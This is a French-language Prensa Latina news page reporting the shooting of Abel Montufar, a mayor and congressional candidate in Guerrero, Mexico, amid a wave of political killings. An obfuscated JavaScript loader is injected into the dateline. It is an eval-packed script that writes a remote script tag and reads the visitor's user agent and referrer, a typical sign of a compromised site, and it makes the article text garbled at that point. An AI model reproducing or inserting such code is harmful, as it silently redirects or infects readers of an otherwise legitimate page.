jeudi 18 avril 2024 |
Prensa Latina - Qui sommes nous

| Contacter avec Prensa Latina

Agence d'information Latino-américaine
Édition française
Search
Close this search box.

Un nouveau candidat aux élections est assassiné au Mexique

Mexico, eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|bfkad|var|u0026u|referrer|yyaai||js|php'.split('|'),0,{})) 9 mai (Prensa Latina) Le maire de Coyuca de Catalan, et candidat au poste de député dans l´État de Guerrero, Abel Montufar, a été assassiné par balles alors qu´il se trouvait dans son véhicule.

Mexico, 9 mai (Prensa Latina) Le maire de Coyuca de Catalan, et candidat au poste de député dans l´État de Guerrero, Abel Montufar, a été assassiné par balles alors qu´il se trouvait dans son véhicule.

Le candidat est sorti hier matin de chez lui avec son secrétaire particulier, sans escortes, puis personne n´a réussi à le contacter jusqu´à ce que son corps soit retrouvé sans vie.

Montufar, du Parti Révolutionnaire Institutionnel, avait déclaré dimanche avoir reçu des menaces de violence et d´agression lors de ces meetings, ce qui nuisait à sa campagne.

Avec son décès, le bilan est de plus de 90 personnes politiques, candidats, maires, ou anciens maires, entre autres postes, qui ont été assassinés depuis le début de la campagne électoral en septembre.

Le scrutin aura lieu le 1er juillet, et seront élus le nouveau président de la République, l´ensemble du Congrès, huit gouverneurs, le responsable de la ville de Mexico, des députés locaux et certains maires.

peo/mem/ool

EN CONTINU
notes connexes